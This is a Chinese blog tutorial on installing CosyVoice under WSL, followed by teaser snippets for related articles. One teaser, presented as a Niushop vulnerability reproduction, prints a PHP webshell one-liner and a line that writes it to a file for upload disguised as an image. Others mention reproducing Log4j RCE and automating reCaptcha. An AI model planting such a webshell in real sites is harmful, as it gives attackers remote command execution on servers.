CosyVoice安装过程详解

CosyVoice安装过程详解

安装过程参考官方文档

前情提要

  1. 环境:Windows子系统WSL下安装的Ubunt22.4
  2. python环境管理:MiniConda3
  3. git

1. Clone代码

$ git clone --recursive https://github.com/FunAudioLLM/CosyVoice.git
# 若是submodule下载失败,要先进入CosyVoice目录再执行以下命令,可以多次执行直到submodule安装成功,会有Successfully提示。
cd CosyVoice
git submodule update --init --recursive

2. 创建虚拟环境

官方使用conda,本次示例使用的是miniconda,都是一样的。

$ conda create -n cosyvoice python=3.10
# 激活环境
$ conda activate cosyvoice
# 安装 pynini
$ pynini是WeTextProcessing所需,若是没有用到ttsfrd的话,默认是使用WeTextProcessing,
$ conda install -y -c conda-forge pynini==2.1.5
# 安装依赖包
# 这是基于刚刚我们进入的CosyVoice目录下执行的命令,若是执行失败,请先注意一下执行文件所在目录
$ pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ --trusted-host=mirrors.aliyun.com
# 若是conda环境已经添加阿里云源的话,-i后面的参数可忽略
# 如果有遇到sox安装问题的话,可执行以下命令
# ubuntu
$ sudo apt-get install sox libsox-dev
# centos
$ sudo yum install sox sox-devel

3. 下载模型

本示例使用git下载,若是git下载不下来,可去魔搭社区搜索下载

# 创建模型存放目录,注意目前所在目录依旧是在CosyVoice/下
$ mkdir -p pretrained_models
# git clone 模型,命令分开执行,可以按需下载所要的模型
$ git clone https://www.modelscope.cn/iic/CosyVoice2-0.5B.git pretrained_models/CosyVoice2-0.5B
$ git clone https://www.modelscope.cn/iic/CosyVoice-300M.git pretrained_models/CosyVoice-300M
$ git clone https://www.modelscope.cn/iic/CosyVoice-300M-25Hz.git pretrained_models/CosyVoice-300M-25Hz
$ git clone https://www.modelscope.cn/iic/CosyVoice-300M-SFT.git pretrained_models/CosyVoice-300M-SFT
$ git clone https://www.modelscope.cn/iic/CosyVoice-300M-Instruct.git pretrained_models/CosyVoice-300M-Instruct
$ git clone https://www.modelscope.cn/iic/CosyVoice-ttsfrd.git pretrained_models/CosyVoice-ttsfrd

注意这里:若是需要ttsfrd模型,那要执行以下步骤,若是不需要就忽略它

# 安装ttsfrd模型
$ cd pretrained_models/CosyVoice-ttsfrd/
$ unzip resource.zip -d .
$ pip install ttsfrd_dependency-0.1-py3-none-any.whl
$ pip install ttsfrd-0.4.2-cp310-cp310-linux_x86_64.whl

PS: 下载下来的ttsfrd有两个包,一个是cp38和cp310,旧的官方文档里python是3.8,那就选择cp38的包,本示例python=3.10,所以用的是cp310的包
在这里插入图片描述

4. 添加环境变量

这条命令不知道是不是tts安装时所需,我第一次安装时没有执行这条命令也是可以运行。

$ export PYTHONPATH=third_party/Matcha-TTS

5. 运行UI

在CosyVoice目录下执行以下命令,可打开UI页面快速熟悉。

$  python3 webui.py --port 50000 --model_dir pretrained_models/CosyVoice-300M
# --model_dir指向刚刚我们下载的模型地址,可启动不同的模型试试看

6. 结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/941830.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

逻辑的诗:类与对象(下)

一、初始化列表 初始化列表的使用方式是以一个冒号开始,接着是一个以逗号分隔的数据成员列表,每个“成员变量”后面跟一个放在括号中的初始化值或表达式; 每个成员变量在初始化列表中只能出现一次,语法理解上初始化列表可以认为…

什么是EMI测试,如何进行EMI测试?

什么是EMI测试? EMI(Electromagnetic Interference,电磁干扰)是指电子设备自身工作过程中产生的电磁波对外发射,从而对设备其它部分或外部其它设备造成干扰,属于电磁兼容的一种。实际测试中,主…

KingbaseES(金仓数据库)入门学习

前言 金仓是一种多进程架构,每一个连接到服务器的会话,在服务器上面都会为该会话分配进程 图形化界面管理 新建数据库名 然后新建一个模式 再创建一个表 新建一个表,然后设置列名 记得要保存 查询数据 也可以新建数据表,用命令…

Burp Suite的安装

1.安装Java 8环境: https://www.java.com/ 2.安装Burp Suite: 3.导出证书,安装证书: 不安装的话无法抓包https协议 4.设置浏览器的代理为Burp Suite: 将浏览器代理端口改为Burp Suite的默认端口 ###我个人在安装中遇到的一些问题: #浏览…

利用Spring Cloud Gateway Predicate优化微服务路由策略

利用Spring Cloud Gateway Predicate优化微服务路由策略 一、Predicate简介 Spring Cloud Gateway 是 Spring 生态系统中用于构建 API 网关的框架,它基于 Project Reactor 和 Netty 构建,旨在提供一种高效且灵活的方式来处理 HTTP 请求和响应。 Spring …

【Java基础面试题035】什么是Java泛型的上下界限定符?

回答重点 Java泛型的上下界限定符用于对泛型类型参数进行范围限制,主要有上界限定符和下届限定符。 1)上界限定符 (? extends T): 定义:通配符?的类型必须是T或者T的子类,保证集合元素一定是T或者T的子类作用&…

用套接字的UDP,TCP知道什么是HTTP吗?

文章目录 UDP和TCP七层网络架构Omnipeek抓包分析举例图片备注code参考code HTTP协议的构成 UDP和TCP UDP(User Datagram Protocol,用户数据报协议) 和 TCP(Transmission Control Protocol,传输控制协议) 是…

Apache Log4j漏洞复现

所用环境 宝塔云服务器 log4j2 是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过…

苍穹外卖-day05redis 缓存的学习

苍穹外卖-day05 课程内容 Redis入门Redis数据类型Redis常用命令在Java中操作Redis店铺营业状态设置 学习目标 了解Redis的作用和安装过程 掌握Redis常用的数据类型 掌握Redis常用命令的使用 能够使用Spring Data Redis相关API操作Redis 能够开发店铺营业状态功能代码 功能实…

CV-OCR经典论文解读|An Empirical Study of Scaling Law for OCR/OCR 缩放定律的实证研究

论文标题 An Empirical Study of Scaling Law for OCR OCR 缩放定律的实证研究 论文链接: An Empirical Study of Scaling Law for OCR论文下载 论文作者 Miao Rang, Zhenni Bi, Chuanjian Liu, Yunhe Wang, Kai Han 内容简介 本论文在光学字符识别&#xf…

PTA数据结构题目:链表操作集合

寻找结点 插入结点 错误分析 while (prev ! NULL && prev->Next ! P) 为什么我写成 while (prev->Next ! P && prev ! NULL) 的时候会发生段错误,这两种写法逻辑上不是一样的吗? 野指针 逻辑顺序导致的潜在风险 在 C 语言中&am…

路由器做WPAD、VPN、透明代理中之间一个

本文章将采用家中TP-Link路由器 路由器进行配置DNS DNS理解知识本文DNS描述参考:网络安全基础知识&中间件简单介绍_计算机网络中间件-CSDN博客 TP LINK未知的错误,错误编号:-22025 TP-LINK 认证界面地址:https://realnam…

Java 小白入门必备知识点

11.我们发现现在有两个x,一个是成员变量,一个是局部变量,在sum方法中为了区分两个s,我们给成员变量前加上this以此来区分成员变量和局部变量 12.成员方法:在java中,必须通过方法才能完成对类和对象的属性操作&#xf…

gitlab代码推送

点击这个√ 修改的文件全部选上 填好提交的名称 点击commit 选取提交的 gitlab 库 点击Push

vscode添加全局宏定义

利用vscode编辑代码时,设置了禁用非活动区域着色后,在一些编译脚本中配置的宏又识别不了 遇到#ifdef包住的代码就会变暗色,想查看代码不是很方便。如下图: 一 解决: 在vscode中添加全局宏定义。 二 步骤&#xff1a…

【电路设计】LDO旁路电容的选择

本文章是笔者整理的备忘笔记。希望在帮助自己温习避免遗忘的同时,也能帮助其他需要参考的朋友。如有谬误,欢迎大家进行指正。 一、引言 虽然人们普遍认为电容是解决噪声相关问题的灵丹妙药,但是电容的价值并不仅限于此。设计人员常常只想到…

生产看板管理系统涵盖哪些方面

嘿,各位搞生产管理的朋友,肯定都碰到过些麻烦事儿吧。我就寻思着,能不能弄出个 “明明白白” 的工作场地呢?让员工和管理人员都能随时查查生产进度,一发现生产里有啥问题就能立马知道。 生产进度不好追踪生产过程不清…

Python|Pyppeteer实现全自动化触发reCaptcha验证码(28)

前言 本文是该专栏的第28篇,结合优质项目案例持续分享Pyppeteer的干货知识,记得关注。 针对近期多位同学,询问如何自动化触发“reCaptcha验证码”的问题。笔者在本文,将结合实战项目完整代码进行详细说明。 对“reCaptcha验证码”感兴趣的同学,千万别错过。 废话不多说,…

SpringBoot介绍以及基本注解和应用

一.Spring Boot 简介(脚手架) 1.简介 简化Spring应用开发的一个框架; 整个Spring技术栈的一个大整合; J2EE开发的一站式解决方案; 优点:快速创建独立运行的spring项目以及与主流框架集成 使用嵌入式的S…

Niushop开源商城(漏洞复现)

文件上传漏洞 注册一个账号后登录 在个人中心修改个人头像 选择我们的图片马 #一句话(不想麻烦的选择一句话也可以) <?php eval($_POST["cmd"]);?> #生成h.php文件 <?php fputs(fopen(h.php,w),<?php eval($_POST["cmd"]);?>); ?&…